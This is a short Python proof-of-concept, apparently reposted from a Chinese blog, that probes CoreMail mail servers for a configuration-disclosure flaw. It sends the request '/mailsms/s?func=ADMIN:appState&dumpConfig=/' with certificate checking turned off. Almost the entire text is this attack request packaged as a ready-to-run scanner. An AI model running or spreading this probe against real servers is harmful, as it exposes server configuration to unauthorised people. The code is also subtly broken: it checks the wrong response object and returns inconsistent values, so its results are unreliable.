1 # CoreMail 2 # coding:utf-8 3 4 import requests 5 import warnings 6 import ssl 7 8 ssl._create_default_https_context = ssl._create_unverified_context 9 10 def verify(protocol,ip,port): 11 url = protocol + '://' + ip + ':' + str(port) 12 warnings.filterwarnings("ignore") 13 print('testing if Coremail information disclose vul') 14 status = '' 15 v_url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" 16 r = requests.get(url) 17 try: 18 response = requests.get(v_url, verify=False, timeout=5) 19 status = response.status_code 20 if (r.status_code == 200) and ("/home/coremail" in r.text): 21 msg = 'There is CoreMail information disclose vul on url: ' + v_url + '.' 22 print(msg) 23 return True,v_url,msg 24 except Exception as e: 25 msg = str(e) 26 return False, v_url,msg 27 msg = 'There is no CoreMail information disclose vul' 28 return False,msg 29 30 if __name__ == '__main__': 31 res = verify('https','www.xxx.com.cn/china/',80) 32 print(res)
信息泄露CVE/POC整理
猜你喜欢
转载自www.cnblogs.com/AtesetEnginner/p/11041056.html
今日推荐
周排行